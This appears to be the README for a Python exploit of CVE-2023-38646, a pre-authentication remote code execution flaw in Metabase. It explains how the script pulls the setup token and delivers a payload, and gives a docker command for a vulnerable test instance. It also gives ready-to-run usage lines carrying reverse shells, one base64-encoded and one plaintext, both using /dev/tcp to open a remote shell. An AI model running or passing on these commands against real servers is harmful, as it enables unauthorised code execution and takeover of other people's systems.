Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection
The script will GET /api/session/properties to get the setup token and assess exploitability of the target. If it's vulnerable will then print the setup token, else it will quit after an error message.
If the -x option is used and the target is vulnerable, it will use the provided payload to attempt to exploit the vulnerability.
More information in this awesome writeup by the team who discovered the vulnerability: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
Usage: CVE-2023-38646.py [-h] [-x BASE64 PAYLOAD] url
Metabase Pre-Auth RCE Exploit
positional arguments:
url Url of the metabase instance
optional arguments:
-h, --help Show this help message and exit
-x BASE64_PAYLOAD Exploits the vulnerabilityIf needed, you can quickly spin up a test environment in a docker container using this command :
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6After visiting http://127.0.0.1:3000/ to finish the setup, and starting a listener,
You can exploit the RCE with something like this :
python3 ./CVE-2023-38646.py -x c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTAvNDQ0MyAwPiYx http://127.0.0.1:3000/
# If you prefer this and use bash (or anything but fish really)
# you should be able to command substitution to encode your payload directly inline like so
python3 ./CVE-2023-38646.py -x $(echo "sh -i >& /dev/tcp/127.0.0.1/4443 0>&1" | base64) http://127.0.0.1:3000/or just grab your own base64 encoded reverse shell by visiting revshells.com